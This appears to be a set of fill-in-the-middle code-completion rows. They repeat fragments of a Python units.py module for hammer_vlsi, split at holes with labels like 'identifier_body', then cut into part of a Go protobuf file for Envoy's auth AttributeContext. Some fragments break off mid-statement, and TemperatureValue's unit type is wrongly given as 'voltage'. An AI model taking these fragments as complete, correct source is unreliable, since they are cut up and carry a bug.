self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
|
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply self by a float or an integer.
"""
return type(self)(str(self.value * other),"")
class TimeValue(ValueWithUnit):
"""Time value - e.g. "4 ns".
Parses time values from strings.
"""
@property
def default_prefix(self) -> str:
"""Default prefix: ns"""
return "n"
@property
def unit(self) -> str:
return "s"
@property
def unit_type(self) -> str:
return "time"
class VoltageValue(ValueWithUnit):
"""Voltage value - e.g. "0.95 V", "950 mV".
"""
@property
def default_prefix(self) -> str:
"""Default is plain volts (e.g. "0.1" -> 0.1 V)."""
return ""
@property
def unit(self) -> str:
return "V"
@property
def unit_type(self) -> str:
return "voltage"
class TemperatureValue(ValueWithUnit):
"""Temperature value in Celsius - e.g. "25 C", "125 C".
Mainly used for specifying corners for MMMC.
"""
@property
def default_prefix(self) -> str:
"""Default is plain degrees Celsius (e.g. "25" -> "25 C")."""
return ""
@property
def unit(self) -> str:
return "C"
@property
def unit_type(self) -> str:
return "voltage"
class CapacitanceValue(ValueWithUnit):
"""Capacitance value - e.g. "5 fF", "10 nF".
"""
@property
def default_prefix(self) -> str:
"""Default prefix: fF"""
return "f"
@property
def unit(self) -> str:
return "F"
@property
def unit_type(self) -> str:
return "capacitance"
| raise TypeError("Types do not match") | conditional_block |
units.py | # units.py
# Unit classes/functions for hammer_vlsi.
#
# See LICENSE for licence details.
from abc import abstractmethod
import sys
try:
from abc import ABC # pylint: disable=ungrouped-imports
except ImportError:
if sys.version_info.major == 3 and sys.version_info.minor < 4:
# Python compatibility: 3.3
# Python 3.3 and below don't have abc.ABC
import abc # pylint: disable=ungrouped-imports
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore
from typing import Optional, TypeVar
from hammer.utils import get_or_else
_TT = TypeVar('_TT', bound='ValueWithUnit')
class ValueWithUnit(ABC):
"""Represents some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def | (self: _TT, other: float) -> _TT:
"""
Multiply self by a float or an integer.
"""
return type(self)(str(self.value * other),"")
class TimeValue(ValueWithUnit):
"""Time value - e.g. "4 ns".
Parses time values from strings.
"""
@property
def default_prefix(self) -> str:
"""Default prefix: ns"""
return "n"
@property
def unit(self) -> str:
return "s"
@property
def unit_type(self) -> str:
return "time"
class VoltageValue(ValueWithUnit):
"""Voltage value - e.g. "0.95 V", "950 mV".
"""
@property
def default_prefix(self) -> str:
"""Default is plain volts (e.g. "0.1" -> 0.1 V)."""
return ""
@property
def unit(self) -> str:
return "V"
@property
def unit_type(self) -> str:
return "voltage"
class TemperatureValue(ValueWithUnit):
"""Temperature value in Celsius - e.g. "25 C", "125 C".
Mainly used for specifying corners for MMMC.
"""
@property
def default_prefix(self) -> str:
"""Default is plain degrees Celsius (e.g. "25" -> "25 C")."""
return ""
@property
def unit(self) -> str:
return "C"
@property
def unit_type(self) -> str:
return "voltage"
class CapacitanceValue(ValueWithUnit):
"""Capacitance value - e.g. "5 fF", "10 nF".
"""
@property
def default_prefix(self) -> str:
"""Default prefix: fF"""
return "f"
@property
def unit(self) -> str:
return "F"
@property
def unit_type(self) -> str:
return "capacitance"
| __mul__ | identifier_name |
units.py | # units.py
# Unit classes/functions for hammer_vlsi.
#
# See LICENSE for licence details.
from abc import abstractmethod
import sys
try:
from abc import ABC # pylint: disable=ungrouped-imports
except ImportError:
if sys.version_info.major == 3 and sys.version_info.minor < 4:
# Python compatibility: 3.3
# Python 3.3 and below don't have abc.ABC
import abc # pylint: disable=ungrouped-imports
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore
from typing import Optional, TypeVar
from hammer.utils import get_or_else
_TT = TypeVar('_TT', bound='ValueWithUnit')
class ValueWithUnit(ABC):
"""Represents some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888 | 'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply self by a float or an integer.
"""
return type(self)(str(self.value * other),"")
class TimeValue(ValueWithUnit):
"""Time value - e.g. "4 ns".
Parses time values from strings.
"""
@property
def default_prefix(self) -> str:
"""Default prefix: ns"""
return "n"
@property
def unit(self) -> str:
return "s"
@property
def unit_type(self) -> str:
return "time"
class VoltageValue(ValueWithUnit):
"""Voltage value - e.g. "0.95 V", "950 mV".
"""
@property
def default_prefix(self) -> str:
"""Default is plain volts (e.g. "0.1" -> 0.1 V)."""
return ""
@property
def unit(self) -> str:
return "V"
@property
def unit_type(self) -> str:
return "voltage"
class TemperatureValue(ValueWithUnit):
"""Temperature value in Celsius - e.g. "25 C", "125 C".
Mainly used for specifying corners for MMMC.
"""
@property
def default_prefix(self) -> str:
"""Default is plain degrees Celsius (e.g. "25" -> "25 C")."""
return ""
@property
def unit(self) -> str:
return "C"
@property
def unit_type(self) -> str:
return "voltage"
class CapacitanceValue(ValueWithUnit):
"""Capacitance value - e.g. "5 fF", "10 nF".
"""
@property
def default_prefix(self) -> str:
"""Default prefix: fF"""
return "f"
@property
def unit(self) -> str:
return "F"
@property
def unit_type(self) -> str:
return "capacitance" | _prefix_table = {
'y': 1e-24, # yocto | random_line_split |
units.py | # units.py
# Unit classes/functions for hammer_vlsi.
#
# See LICENSE for licence details.
from abc import abstractmethod
import sys
try:
from abc import ABC # pylint: disable=ungrouped-imports
except ImportError:
if sys.version_info.major == 3 and sys.version_info.minor < 4:
# Python compatibility: 3.3
# Python 3.3 and below don't have abc.ABC
import abc # pylint: disable=ungrouped-imports
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore
from typing import Optional, TypeVar
from hammer.utils import get_or_else
_TT = TypeVar('_TT', bound='ValueWithUnit')
class ValueWithUnit(ABC):
"""Represents some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
|
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply self by a float or an integer.
"""
return type(self)(str(self.value * other),"")
class TimeValue(ValueWithUnit):
"""Time value - e.g. "4 ns".
Parses time values from strings.
"""
@property
def default_prefix(self) -> str:
"""Default prefix: ns"""
return "n"
@property
def unit(self) -> str:
return "s"
@property
def unit_type(self) -> str:
return "time"
class VoltageValue(ValueWithUnit):
"""Voltage value - e.g. "0.95 V", "950 mV".
"""
@property
def default_prefix(self) -> str:
"""Default is plain volts (e.g. "0.1" -> 0.1 V)."""
return ""
@property
def unit(self) -> str:
return "V"
@property
def unit_type(self) -> str:
return "voltage"
class TemperatureValue(ValueWithUnit):
"""Temperature value in Celsius - e.g. "25 C", "125 C".
Mainly used for specifying corners for MMMC.
"""
@property
def default_prefix(self) -> str:
"""Default is plain degrees Celsius (e.g. "25" -> "25 C")."""
return ""
@property
def unit(self) -> str:
return "C"
@property
def unit_type(self) -> str:
return "voltage"
class CapacitanceValue(ValueWithUnit):
"""Capacitance value - e.g. "5 fF", "10 nF".
"""
@property
def default_prefix(self) -> str:
"""Default prefix: fF"""
return "f"
@property
def unit(self) -> str:
return "F"
@property
def unit_type(self) -> str:
return "capacitance"
| """Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses.""" | identifier_body |
attribute_context.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: envoy/service/auth/v2/attribute_context.proto
package envoy_service_auth_v2
import (
fmt "fmt"
core "github.com/cilium/proxy/go/envoy/api/v2/core"
proto "github.com/golang/protobuf/proto"
timestamp "github.com/golang/protobuf/ptypes/timestamp"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// An attribute is a piece of metadata that describes an activity on a network.
// For example, the size of an HTTP request, or the status code of an HTTP response.
//
// Each attribute has a type and a name, which is logically defined as a proto message field
// of the `AttributeContext`. The `AttributeContext` is a collection of individual attributes
// supported by Envoy authorization system.
// [#comment: The following items are left out of this proto
// Request.Auth field for jwt tokens
// Request.Api for api management
// Origin peer that originated the request
// Caching Protocol
// request_context return values to inject back into the filter chain
// peer.claims -- from X.509 extensions
// Configuration
// - field mask to send
// - which return values from request_context are copied back
// - which return values are copied into request_headers]
// [#next-free-field: 12]
type AttributeContext struct {
// The source of a network activity, such as starting a TCP connection.
// In a multi hop network activity, the source represents the sender of the
// last hop.
Source *AttributeContext_Peer `protobuf:"bytes,1,opt,name=source,proto3" json:"source,omitempty"`
// The destination of a network activity, such as accepting a TCP connection.
// In a multi hop network activity, the destination represents the receiver of
// the last hop.
Destination *AttributeContext_Peer `protobuf:"bytes,2,opt,name=destination,proto3" json:"destination,omitempty"`
// Represents a network request, such as an HTTP request.
Request *AttributeContext_Request `protobuf:"bytes,4,opt,name=request,proto3" json:"request,omitempty"`
// This is analogous to http_request.headers, however these contents will not be sent to the
// upstream server. Context_extensions provide an extension mechanism for sending additional
// information to the auth server without modifying the proto definition. It maps to the
// internal opaque context in the filter chain.
ContextExtensions map[string]string `protobuf:"bytes,10,rep,name=context_extensions,json=contextExtensions,proto3" json:"context_extensions,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// Dynamic metadata associated with the request.
MetadataContext *core.Metadata `protobuf:"bytes,11,opt,name=metadata_context,json=metadataContext,proto3" json:"metadata_context,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext) Reset() { *m = AttributeContext{} }
func (m *AttributeContext) String() string { return proto.CompactTextString(m) }
func (*AttributeContext) ProtoMessage() {}
func (*AttributeContext) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0}
}
func (m *AttributeContext) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext.Unmarshal(m, b)
}
func (m *AttributeContext) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext.Marshal(b, m, deterministic)
}
func (m *AttributeContext) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext.Merge(m, src)
}
func (m *AttributeContext) XXX_Size() int {
return xxx_messageInfo_AttributeContext.Size(m)
}
func (m *AttributeContext) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext proto.InternalMessageInfo
func (m *AttributeContext) GetSource() *AttributeContext_Peer {
if m != nil {
return m.Source
}
return nil
}
func (m *AttributeContext) GetDestination() *AttributeContext_Peer {
if m != nil {
return m.Destination
}
return nil
}
func (m *AttributeContext) GetRequest() *AttributeContext_Request {
if m != nil {
return m.Request
}
return nil
}
func (m *AttributeContext) GetContextExtensions() map[string]string {
if m != nil {
return m.ContextExtensions
}
return nil
}
func (m *AttributeContext) GetMetadataContext() *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
